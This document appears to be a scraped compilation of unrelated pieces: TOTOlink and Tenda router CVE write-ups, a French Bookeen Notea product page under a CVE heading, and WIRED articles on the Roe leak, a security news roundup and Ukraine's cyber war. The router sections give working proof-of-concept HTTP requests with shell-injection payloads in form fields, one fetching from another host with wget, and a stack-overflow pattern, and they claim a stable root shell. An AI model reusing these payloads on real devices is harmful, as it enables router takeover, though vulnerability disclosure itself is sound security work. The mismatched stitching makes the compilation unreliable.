It is found that there is a command injection vulnerability in the setWiFiWpsCfg interface in TOTOlink A7100RU (v7.4cu.2313_b20191024) router, which allows an attacker to execute arbitrary commands through a carefully constructed payload.

**TOTOlink A7100RU Command injection vulnerability****Overview**

*   Manufacturer's website information：http://totolink.net/
*   Firmware download address ： http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content obtained by the wscdisabled parameter to the V5 parameter, and then brings V5 into UCI\_ Set\_ STR function

Format the A4 matched content into V11 through snprintf function, and then bring V11 into cstesystem function

The function directly brings user input into the execv function, which has a command injection vulnerability

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
2.  Attack with the following overflow POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setWiFiWpsCfg",
    "wscDisabled":"1$(ls>/tmp/123;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28583: IOT_vuln/TOTOLink/A7100RU/7 at main · EPhaha/IOT_vuln

It is found that there is a command injection vulnerability in the setWiFiWpsStart interface in TOTOlink A7100RU (v7.4cu.2313_b20191024) router, which allows an attacker to execute arbitrary commands through a carefully constructed payload.

**TOTOlink A7100RU Command injection vulnerability****Overview**

*   Manufacturer's website information：http://totolink.net/
*   Firmware download address ： http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content obtained by htbsscoexistence parameter to V15, and then brings V15 to UCI\_ Set\_ In str function

Format the A4 matched content into V11 through snprintf function, and then bring V11 into cstesystem function

The function directly brings user input into the execv function, which has a command injection vulnerability

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
2.  Attack with the following overflow POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setWiFiWpsStart",
    "htBSSCoexistence":"1$(ls>/tmp/123;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28584: IOT_vuln/TOTOLink/A7100RU/8 at main · EPhaha/IOT_vuln

Bookeen Notea Firmware BK_R_1.0.5_20210608 is affected by a directory traversal vulnerability that allows an attacker to obtain sensitive information.

**Comme sur le papier**

La saisie au stylet WACOM rapide et sensible à la pression permet de dessiner avec une grande précision. Initialement **mise au point pour les tablettes graphiques professionnelles,** cette technologie ne nécessite ni fil, ni batterie et autorise une écriture souple et précise. L’affichage instantané sur la surface texturée de l’écran à encre électronique Eink offre une expérience d'écriture identique à celle que l'on a sur papier.

*   **Saisie au stylet**
    
    Technologie Wacom avec 4096 niveaux de pression.
    
*   **Effet papier**
    
    Ecran Eink (16 niveaux de gris) lisible en plein soleil avec une résolution 1404\*1872 de 227dpi
    
*   **Grand écran**
    
    Surface d'affichage de 10,3 pouces (26cm) de diagonale équivalent au format A5
    
*   **Eclairage pour usage de nuit**
    
    Luminosité programmable avec option de réglage de la lumière bleue.
    

**Une saisie ultra-précise pour professionnels**

Initialement mise au point pour les graphistes professionnels, la technologie Wacom autorise une saisie très précise sans interférence avec l'appui de la paume sur l'écran. La Notéa est ainsi compatible avec tous les stylets Wacom et peut gérer jusqu'à 4096 niveaux de pression.

**Un nouvel outil dans votre espace de travail**

La Notéa ajoute des fonctions numériques à votre bloc-notes. Le reconnaissance d'écriture, l'annotation de livres et documents, le partage par email ou sur grand écran.

*   **Transcription des notes**
    
    Conversion automatique des notes manuscrites en texte par MyScript© (33 langues)
    
*   **Annotation de documents**
    
    Prise de notes directement sur documents PDF et EPUB
    
*   **Partage par email**
    
    Envoi et réception directs des notes et documents depuis le bloc-notes numérique.
    
*   **Affichage sur grand écran**
    
    Partage d'écran et diffusion sur téléviseur via Miracast
    

**L'expertise de l'écriture numérique**

La Notéa intègre Myscript©, le plus puissant moteur de reconnaissance d'écriture manuscrite. Les notes qu'elles soient écrites en cursives, en majuscules ou en scriptes, sont converties en quelques secondes vers un fichier Txt ou PDF. Ne laissez plus votre contenu manuscrit à l'écart de votre quotidien dans le monde numérique.

**Autonome et mobile**

Avec son poids plume, prenez votre Notéa partout avec vous. Sa batterie de haute capacité (4000 mAh) vous offrira une autonomie d'une semaine sans recharge. La Notéa possède 32Go de stockage interne et peut également se synchroniser avec différents services de Cloud.

*   **1 semaine d'autonomie**
    
    Batterie Lithium Polymer 4000mAh
    
*   **Mémoire**
    
    32 Go de stockage interne et accès aux différentes services de stockage dans le cloud via les apps.
    
*   **Transfert et partage**
    
    Connexion sans-fil Wifi : IEEE 802.11 b/g/n et Bluetooth : BT 4.2 & BLE.
    
*   **USB-C**
    
    Connecteur USB pour recharge, casque audio, connexion PC
    

**Une tablette à part entière**

La Notéa® peut être considérée comme une tablette tactile Android à part entière proposant un accès à un store d'applications. La Notéa est équipée de deux haut-parleurs et d’un micro.

*   **Interface au doigt**
    
    Ecran tactile capacitif sans interférence avec le stylet
    
*   **Audio**
    
    Haut-parleurs ou écouteurs par USB-C ou Bluetooth pour les applications audio
    
*   **Enregistrement**
    
    Microphone intégré pour les apps nécessitant un enregistrement audio et/ou une prise de son
    
*   **Store d'applications**
    
    Compatible avec le système Android 8.. Accès au Playstore pour télécharger des Apps.
    

*   **Mine texturée**
    
    La mine du stylet spécialement conçue pour procurer un touché très proche de celui de l'écriture sur papier.
    
*   **Gomme**
    
    Bouton latéral qui permet au stylet de basculer en mode gomme et d'effacer par trait ou par zone.
    
*   **Ctrl-z**
    
    Rien n'est irréversible sur la Notéa, bouton latéral d'annulation et de reprise des derniers traits réalisés au stylet.
    
*   **Bluetooth**
    
    Appairage Bluetooth avec la Notéa permettant la personnalisation et l'utilisation de trois boutons latéraux. Fonction Bluetooth rechargeable par USB.
    

**Spécifications techniques**

**Dimensions**

Modèle : CYBN10F

Fonction : Bloc-Notes numérique

Dimensions : 191,1 x 232,5 x 8,0 mm

Poids : 460 g

**Logiciel**

Système d'exploitation : Android 8.1

Play Store : Installable

**Ecran**

Taille : 10,3'' (26cm)

Résolution (Pixels) : 1404\*1872

DPI : 227

Niveaux de gris : 16

Ecran capacitif : oui

Wacom (EMR) : Oui

Front Light (FL) : Oui

Filtre lumière bleue : Oui

**Electronique**

CPU : 1.8 GHz Quad-Core

RAM : 2 Go

Stockage : 32 Go

USB 2.0 : Type C

LED de charge : Blanc

Écouteurs : Type C

Micro : Oui

Haut-parleur : Stéréo

Wi-Fi : IEEE 802.11 b/g/n

Bluetooth : BT 4.2

Bluetooth BLE : Oui

Accéléromètre : Oui

Effet Hall : Oui (Couverture intelligente)

Power button : Power on/off

**Batterie et autonomie**

Type : Lithium-Ion Polymer

Capacité : 3,7 V/4000 mAh

Consommation en veille : 2,0 mA

Durée en veille : 60 jours

**Stylet**

Wacom (EMR) : Oui (4096 niveux de pression)

Bluetooth : 3 boutons : mise en veille, haut, bas

Micro-USB : Recharge batterie pour fonction Bluetooth

**Inscription à la Newsletter**

CVE-2021-45783: Bookeen, la lecture numérique

The leak of a draft opinion overturning Roe v. Wade quickly sparked a court investigation. Which laws may have been violated, if any, remains uncertain.

The leak of a seismic draft opinion from the US Supreme Court that would overturn _Roe v. Wade_ has somehow managed overnight to elicit roughly equal outpourings of anger from the right and left: The left has rallied to decry a decision that would overturn a 50-year-old cornerstone of reproductive rights. Conservatives, despite the historic victory the ruling would represent for their side, have meanwhile targeted their political outrage at a far more specific individual: the leaker.

Just hours after Politico published a draft of the majority ruling written by Justice Samuel Alito calling the _Roe_ decision "egregiously wrong from the start" and overruling that five-decade-old precedent, figures across the right issued a chorus of calls for the investigation and prosecution of the anonymous source of the "illegal" leak. CBS News went so far as to report—somewhat vaguely—that it expects an investigation “involving the FBI” into the leak's source. And Chief Justice John Roberts has opened an investigation into the disclosure.

But all of that furor is undermined by an inconvenient legal truth: Leaking a Supreme Court decision doesn't actually seem to be a crime—at least not by any clear and undisputed definition. "Right now, it's unclear whether the leaker broke any law at all," says Trevor Timm, a First Amendment–focused lawyer and the executive director of the Freedom of the Press Foundation. "Even the people claiming this act is beyond the pale and the FBI must investigate haven't pointed to a definitive law this leaker allegedly broke."

Timm cites a lengthy Twitter thread published late Monday by the well-known UC Berkeley legal scholar Orin Kerr, who responded to the leak Monday night by pointing out that a Supreme Court draft doesn't meet any of the obvious criteria that would make it an illegal document to hand to a journalist: Most important, it's not classified, so leaking it doesn't open the leaker to prosecution under the Espionage Act. "As far as I can tell, there is no federal criminal law that directly prohibits disclosure of a draft legal opinion," Kerr concluded.

Of course, if the source is someone who hacked into a computer of, say, a Supreme Court justice or law clerk—or swiped the paper off their desk—the leaker could be prosecuted with computer fraud and abuse or theft, Kerr points out. But otherwise, despite the historical rarity of Supreme Court leaks and the politically radioactive nature of this one, Kerr argues there's no slam-dunk argument to federally prosecute the leaker.

Instead, Kerr suggests that any federal prosecutor seeking to make a case against Politico's leaker might have to resort to a far shakier statute, known as 18 U.S.C. § 641. That broad statute forbids the theft or misuse of government-owned "things of value"—a broadly written law seemingly designed at a surface level to prevent embezzlement or graft by those with access to the government's property. But whether it applies to information—and what kind of information, given to whom—remains an open question in federal law, with different circuit courts fundamentally disagreeing in their rulings.

"Legal scholarship provides little clarity regarding § 641’s interpretation; only a few scholars have even recognized § 641’s application to information," reads a _Columbia Law Review_ article about the statute's use for prosecuting leakers, written by Jessica Lutkenhaus, an attorney focused on criminal defense at the law firm Wilmer Hale. "The circuits disagree about whether § 641 applies to information, and, if it does, what its scope is: What information constitutes a 'thing of value'?"

Sharing information is arguably fundamentally different from stealing "a thing of value," Freedom of the Press Foundation's Timm points out. "You can't steal a government Jeep or take something tangible or physical from government offices," Timm says. "But copying something can be construed as different from stealing something. You copy it, and the original thing is still there, and you just leave with papers that didn't exist before."

That ambiguity has led different federal courts to come to contradictory conclusions. A Fourth Circuit court, for instance, found in 1991 that a Department of Defense employee who left the DOD for a job at a defense contractor and took information with him was guilty of violating § 641. But a Ninth Circuit court has come to an opposite conclusion, finding in a 1959 case that "intangible" goods are not covered by § 641. That ruling was later applied in 1988 by the same circuit to the case of an information leaker, a naval officer accused of stealing computer punch cards related to secret encryption information. The court confirmed that the information itself was not covered by § 641—though his appeal was thrown out anyway because he'd stolen the physical punch cards that stored it.

Other circuit courts have come to conclusions somewhere in between, with some finding, for instance, that the § 641 _does_ apply to information leaks but noting that this doesn't extend to those covered by the First Amendment's protections on free speech and freedom of the press—findings with direct relevance to Politico's Supreme Court leaker.

Several of the most notable leakers in history have been charged under 18 U.S.C. § 641, too, including Daniel Ellsberg, Chelsea Manning, and Edward Snowden. But the use of that law was overshadowed by their prosecution under the Espionage Act, since all three were accused of leaking classified secrets, and none set a clear precedent. Ellsberg's charges were dropped due to improper government conduct by the Nixon administration, and Snowden has yet to face trial. Manning was convicted on the 18 U.S.C. § 641 count she faced, but in a military court, not a civilian one.

All of that leaves the legal status of Politico's leaker—if they are identified—far from certain. But any confident argument that they committed a crime is on equally shaky terrain, argues Timm. And that's especially true in a case where the leaker appears to have leaked a document directly to the press, with a clear interest in making the information public.

"Even if prosecutors think 18 U.S.C. § 641 applies, I'd have serious First Amendment concerns with broadly applying it to anyone who leaks a government document to the press," Timm says. "Leaks to the press are as American as apple pie. And, in many cases throughout history, have furthered democracy rather than hindered it."

More Great WIRED Stories

*   📩 The latest on tech, science, and more: Get our newsletters!
*   Sober influencers and the end of alcohol
*   For mRNA, Covid vaccines are just the beginning
*   The future of the web is AI-generated marketing copy
*   Keep your home connected with the best wi-fi routers
*   How to limit who can contact you on Instagram
*   👁️ Explore AI like never before with our new database
*   🏃🏽‍♀️ Want the best tools to get healthy? Check out our Gear team’s picks for the best fitness trackers, running gear (including shoes and socks), and best headphones

Is Leaking a SCOTUS Opinion a Crime? The Law Is Far From Clear

There is a stack overflow vulnerability in the goform/fast_setting_wifi_set function in the httpd service of Tenda ac9 15.03.2.21_cn router. An attacker can obtain a stable shell through a carefully constructed payload

**Tenda AC9 router has a stack overflow vulnerability****Firmware address**

Tenda official website：https://www.tenda.com.cn/default.html

About Tenda：https://www.tenda.com.cn/profile/contact.html

Firmware Download：https://www.tenda.com.cn/download/

**Impact version**

The latest version is shown in the figure

**Vulnerability details**

The program passes the content obtained by SSID parameter to SRC, and then copies SRC into S's stack through strcpy function. There is no size check, so there is a stack overflow vulnerability.

**Vulnerability recurrence and POC**

To reproduce the vulnerability, follow these steps：

​ 1.Use fat to simulate firmware V15 03.2.21\_ cn

​ 2.Attack with the following POC attacks

    POST /goform/fast_setting_wifi_set HTTP/1.1
    Host: 192.168.11.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 1131
    Origin: http://192.168.11.1
    Connection: close
    Referer: http://192.168.11.1/parental_control.html?random=0.16095210121969683&
    Cookie: password=7c90ed4e4d4bf1e300aa08103057ccbcetv1qw
    
    ssid=9c%3Afc%3Ae8%3A1a%3A33%3A80aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
    

The picture shows the effect of POC attack

Finally, you can write exp, which can achieve a very stable effect of getting the root shell

CVE-2022-28560: -Router-vulnerability/Tenda AC9 at main · iot-firmeware/-Router-vulnerability

Tenda AX1806 v1.0.0.1 was discovered to contain a command injection vulnerability in `SetIPv6Status` function

**Tenda AX18 v1.0.0.1 has a commend injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: Tenda (https://tenda.com.cn)
*   **Products**: WiFi Router AX1806 v1.0.0.1 and AX1803 v1.0.0.1
*   **Firmware download address:** https://tenda.com.cn/download/detail-3225.html
*   **Firmware download address:** https://www.tenda.com.cn/product/download/AX1806.html

**Description****1.Product Information:**

Tenda AX1806 v1.0.0.1 and AX1803 v1.0.0.1 router, the latest version of simulation overview：

**2\. Vulnerability details**

Tenda AX1806 and AX1803 was discovered to contain a command injection vulnerability in SetIPv6Status function

When we set connect type = PPPoE we will get a command injection vulnerability after login.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/setIPv6Status HTTP/1.1
    Host: 192.168.2.1
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://192.168.2.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    IPv6En=1&conType=PPPoE&ISPusername=addasdas&ISPpassword=$(wget http://192.168.2.2:9999/)&prefixDelegate=0&wanAddr=%2F&gateWay=&lanType=undefined&wanPreDNS=&wanAltDNS=&lanPrefix=undefined%2F64

CVE-2022-28572: CVEIDs/TendaAX18 at main · F0und-icu/CVEIDs

CVE-2022-28572: TempName/TendaAX18 at main · F0und-icu/TempName

Plus: Trump backers breach election systems, Microsoft tracks Russia's war prep, a new Facebook leak reveals a mess, and Bored Ape Yacht Club gets hacked.

Surprising news abounded this week as Ukrainian officials weigh next steps in their digital campaigns against Russia, given that their efforts so far have been unexpectedly successful, if sometimes controversial. Overall, Russia is being pummeled with cyberattacks of all sorts at a scale beyond anything the country has dealt with before.

Meanwhile, new research indicates that a small group of North Koreans have taught themselves to jailbreak smartphones in an effort to bypass the regime's extensive digital restrictions and access forbidden media.

Elon Musk's bid this week to purchase Twitter highlighted a host of potential privacy and security concerns for the platform's users. The United States faced a notable spike in child sexual abuse sites in 2021 as CSAM hosting continued to increase dramatically around the world. Hollywood's fight against VPNs has gotten more heated as the entertainment industry expands its accusations about illegal activity enabled by the services. And Cloudflare recorded a historic DDoS attack that bombarded a cryptocurrency platform with 15.3 million requests.

If you feel like doing something for your own security or that of your business this weekend, we've got a roundup of all the most critical mainstream vulnerabilities from April that you can patch right now. 

And there's more. We’ve rounded up all the news that we didn’t break or cover in depth this week. Click on the headlines to read the full stories. And stay safe out there.

The Office of the Director of National Intelligence released its annual transparency report on Friday, which showed that the FBI conducted as many as 3.4 million warrantless searches of Americans’ data in 2021, including 1.9 million searches related to a Russian cyberattack. This is the first time ODNI has published a number for FBI searches utilizing the Foreign Intelligence Surveillance Act of 1978, or FISA. The law is meant to authorize investigative capabilities related to foreign threats, but it allows for some incidental domestic searches in the process. FISA activity has often been criticized for happening without public transparency.

In an in-depth analysis, Reuters looks at eight incidents around the country in which activists supportive of former President Donald Trump have attempted to breach or successfully compromised local voting systems as part of their quest to uncover evidence of manipulation in the 2020 US presidential election. In most cases, activists persuaded local election officials, all Republicans, to export and leak vote data. In the year and a half since Joe Biden became president, Trump loyalists have continued to falsely assert that voting machines across the US were compromised to produce Biden's win.

“These threats are being fueled by extreme elected officials and political insiders who are spreading the Big Lie”—that the 2020 vote was stolen—“to further suppress the vote, destabilize American elections, and undermine voter confidence,” Colorado Secretary of State Jena Griswold told Reuters in a statement.

In a report on Wednesday, Microsoft said it has found evidence that Russia began setting the stage for its invasion of Ukraine as early as March or April 2021. During that time, Russian state-backed hackers began establishing access points in Ukrainian government and critical infrastructure systems, researchers found. The attackers seem to have been collecting intelligence on the Ukrainian military, NATO member states, and diplomatic targets. In the report, Microsoft calls Russian aggression against Ukraine a “hybrid war” and says that Russian cyberattacks have been “relentless and destructive.” 

Microsoft reports that in early 2021, as Russian troops began to gather at the Ukrainian border, the Russian hacking group known as APT 29, Cozy Bear, and Nobelium began mounting phishing attacks to establish access. Microsoft says the Russian hacking group known as Ghostwriter was also active at this time, targeting Ukrainian military email accounts and networks with phishing attacks.

An internal Facebook document prepared last year and obtained by Motherboard lays out concerns from privacy engineers on the social network's Ad and Business Product team about the company's ability to account for the data it holds and track data as it moves through the service. The revelations are not necessarily surprising, given Facebook's sheer scale and recurrent data control issues, but they are significant as the tech giant works to comply with an increasing array of privacy legislations around the world. 

“We do not have an adequate level of control and explainability over how our systems use data, and thus we can’t confidently make controlled policy changes or external commitments such as ‘we will not use X data for Y purpose.’ And yet, this is exactly what regulators expect us to do, increasing our risk of mistakes and misrepresentation,” the document says.

A company spokesperson told Motherboard that the document “does not describe our extensive processes and controls to comply with privacy regulations” and that “this document reflects the technical solutions we are building to scale the current measures we have in place to manage data and meet our obligations.”

Hackers compromised the Instagram account of NFT collection Bored Ape Yacht Club on Monday, posting a link to a copycat site that scammed visitors out of NFTs. The company said in a statement to WIRED that “Rough estimated losses due to the scam are 4 Bored Apes, 6 Mutant Apes, and 3 BAKC, as well as assorted other NFTs estimated at a total value of ~$3m.” NFT scams and other cryptocurrency hustles in which attackers publish a malicious or misleading link to steal coins are unfortunately not new. The BAYC situation is particularly ominous, though, because the company says it had full two-factor authentication enabled on the Instagram account and that “the security practices surrounding the IG account were tight.” The group is investigating how the Instagram takeover occurred.

More Great WIRED Stories

*   📩 The latest on tech, science, and more: Get our newsletters!
*   Sober influencers and the end of alcohol
*   For mRNA, Covid vaccines are just the beginning
*   The future of the web is AI-generated marketing copy
*   Keep your home connected with the best wi-fi routers
*   How to limit who can contact you on Instagram
*   👁️ Explore AI like never before with our new database
*   🏃🏽‍♀️ Want the best tools to get healthy? Check out our Gear team’s picks for the best fitness trackers, running gear (including shoes and socks), and best headphones

FBI Conducted 3.4 Million Warrantless Searches of Americans' Data

Even the head of the country's online offensive is surprised by the successes—although they’re not without controversy.

When Russian president Vladimir Putin launched his full invasion of Ukraine in February, the world expected Moscow’s cyber and information operations to pummel the country alongside air strikes and shelling. Two months on, however, Kyiv has not only managed to keep the country online amidst a deluge of hacking attempts, but it has brought the fight back to Russia.

Even Ukrainian officials are surprised by how ineffective Russia’s digital war has been.

“I think that the root cause of this is the difference between our systems,” says Mykhailo Fedorov, Ukraine’s 31-year-old minister for digital transformation. “Because the Russian system is centralized. It's monopolized. And it leads to the scale of corruption and graft that is becoming increasingly apparent as the war continues.”

Speaking to WIRED from near Kyiv, Fedorov says his country has been preparing for this moment since Russia first invaded in 2014. “We have had eight years,” he says.

In recent weeks, Fedorov and the Ukrainian government have deployed the controversial face recognition program ClearviewAI to identify killed and captured Russian soldiers. They have deployed thousands of Elon Musk’s Starlink terminals to keep the country connected, even amid Russian bombardment. They have crowdsourced intelligence collection, letting ordinary Ukrainians report troop movements. And, perhaps most critically, they have beaten back aggressive attempts to knock offline their internet, energy, and financial systems.

Fedorov, who also serves as deputy prime minister, ran Ukrainian president Volodmyr Zelensky’s wildly successful election campaign in 2019, winning by nearly 50 points in the second round against incumbent Petro Poroshenko. He did so, in part, by leveraging authentic selfie videos to market the former comedian as an unconventional politician who eschews the normal trappings of politics. It’s exactly that style of video that Zelensky has uploaded regularly from the streets of Kyiv in recent weeks, offering a stark contrast with Putin’s stiff proclamations inside his palatial offices.

Ukraine has brought the war home to Russia in more cutting ways. In March, Reuters reported that Ukraine had purchased face recognition software from American company Clearview AI to identify the bodies of Russian soldiers killed in action—Kyiv later acknowledged that they were using this information to contact the families of the dead soldiers.

“We are pursuing two goals here,” Fedorov says. “First is: We are notifying their relatives, and telling them, basically, that it's not a very good idea to go to war with Ukraine. So that serves as a cautionary tale. And secondly, it's a humanitarian purpose—just telling them where their relatives, or friends, or children are so that they don't try to get this information from the Russian authorities. Because, more often than not, they can't.”

That decision hasn’t come without criticism. Contacting the families of soldiers killed in battle could be seen as harassment. Others have pointed out that being deployed in Ukraine is a PR coup for ClearviewAI, which has been embroiled in scandal over its liberal use by police forces across North America.

Fedorov, for his part, says Russia “can spin this whatever way they want. But the fact of the matter is, there are tens of thousands of Russians dying in Ukraine, and we are just providing this information to their families because that serves, among other things, a humanitarian purpose.”

There is a propaganda element to Kyiv’s use of face recognition technology as well.

“This facial recognition plays to our, let's say, to our advantage in the information space,” Fedorov says. Moscow has projected the image of a professional and volunteer fighting force. “We're trying to say that, for example, Russia is sending conscripts … we are proving that and justifying that with a lot of factual information. We can give you a list of hundreds of people who are 18 and 19 years old, with their names and with their birth dates and how and where specifically, they were conscripted. So that gives some substance to our claims.”

Fedorov says the utility goes beyond just identifying the dead.

“One interesting case study of how we used Clearview AI,” Fedorov says. “There was a man who was found in a Ukrainian hospital, claiming that he was a Ukrainian soldier who suffered from shell shock or some kind of trauma and that he forgot everything. And he was claiming that he was Ukrainian. So the doctor sent the picture to us, and we were able to ID him in a matter of minutes. We found his social network profile, and we established that he was Russian and, of course, he was brought to responsibility.”

Ukrainian officials have said that the frequency of Russian cyberattacks tripled immediately prior to the war, and they have aggressively targeted critical infrastructure since the war began.

But Viktor Zhora, deputy head of Ukraine's State Service of Special Communications and Information Protection, says Moscow may have maxed out its ability to launch attacks. “Russian cyber operations likely reached their full potential," he says.

Zhora told WIRED that years of training, exercises, and cooperation with NATO have made Ukraine far more resilient to cyberattacks. Some attacks are easier to defend against than others—as we spoke, Zhora said he was monitoring an active attack on the state administration of Lviv, which had been publicly announced by Russia hours earlier.

But Zhora stresses that while it is wrong to overestimate how powerful Russia’s cyber capabilities are, it would also be wrong to underestimate its more “sophisticated” operations. “We should continue to observe their potential, like Sandworm, like a Fancy Bear, like Gamaredon, many other groups that are still active, and still very dangerous,” he says, referring to a number of Russian government hacker groups.

Brandon Valeriano, a senior fellow at the Cato Institute who specializes in cyber operations, says offensive cyber operations don’t mesh well with traditional, kinetic warfare. At best, he says, “they’re enabling, they’re complimentary … they don’t transform it.”

Valeriano points to a slowdown in the tempo of Russian-backed cyberattacks targeting the United States as evidence that Moscow’s capacity isn’t as expansive as some have assessed. “They’re not organized for offensive cyber operations in the way that we think they are,” he says.

Kyiv’s ability to beat back against those operations, Valeriano says, can be attributed to “intense collaboration between Ukraine, Western powers, and NATO.” Indeed, Five Eyes signals intelligence agencies have both been providing training and support for Ukraine’s cyber defense and have been sharing threat intelligence. (Zhora stresses that information-sharing is a “two-way road.”)

Ukraine has been able to defend itself, both in cyberspace and in an outright propaganda war, because it has managed to stay online. For that, Fedorov credits a decentralized network of internet service providers and Elon Musk.

“It wouldn't be possible to restore 10 km of cable connection between villages in Chernigiv region after serious battles so quick,” he tweeted earlier this month. “Normally it takes few months.” But with one Starlink satellite, he says, five villages were reconnected in a matter of days.

“We have received over 10,000 Starlink terminals to date, and we use those where we have blind spots with, let's say, more traditional coverage,” Fedorov says. “So we are trying very hard to restore and protect our landline and mobile connections.”

Like any physical infrastructure, those Starlink terminals—which have even managed to keep the embattled city of Mariupol online—have been vulnerable to Russian shelling. Zhora says Russia has managed to hit some of those terminals but has not managed to target the system as a whole. “I suppose that it was coincidence that some shells hit these terminals and locations,” Zhora says. “It's not easy to identify and to attack them systematically.”

Keeping Ukrainians online is a clear strategic objective for Ukraine. Photo and video evidence of the brutality being doled out by the Russian army has galvanized Western support for Kyiv and led to an unprecedented level of support from NATO to help the country defend itself.

It’s also letting regular Ukrainians contribute to the collective defense.

During Zelensky’s presidential campaign, Fedorov made particular use of the messaging app Telegram, which is also popular with Russian intelligence operatives. In recent weeks, the app has been leveraged to collect evidence of possible war crimes in towns like Bucha, but also to enable Ukrainians to upload details of Russian troop movements. A Telegram bot collects photos and videos of Russian military movements, verifying Ukrainians through their digital ID,: a project spearheaded by Fedorov.

“Regular internet users—so, basically, civilians—they can go and post photos of what's happening in Ukraine,” Fedorov says.

The Ukrainian security ministry said in a tweet in March that those crowdsourced reports have directly contributed to drone strikes against Russian tanks.

“There are actually very many ways that regular citizens can contribute to the effort,” Fedorov says. One particularly “successful vector,” he says, is basically trolling. His government has been sending users “into the comment sections of posts by some very high traffic Russian influencers and just trying to talk sense into people and telling them that there's actually a war in Ukraine.”

Fedorov is also responsible for Ukraine’s IT Army, a network of cyber activists and hackers who have targeted Russian systems. In recent weeks, they have dumped huge troves of personal information from large Russian corporations.

Russia’s poor information security has also been a significant factor in their fumbled invasion.

A huge number of technology providers, from cybersecurity firms to cloud hosting services, have pulled out of Russia since the start of the war—either due to sanctions or to a concerted push from Fedorov and others in the Ukrainian government. “If the world were able to stop the delivery of these products to Russia, we see that they will have no infrastructure even to organize attacks,” Zhora says.

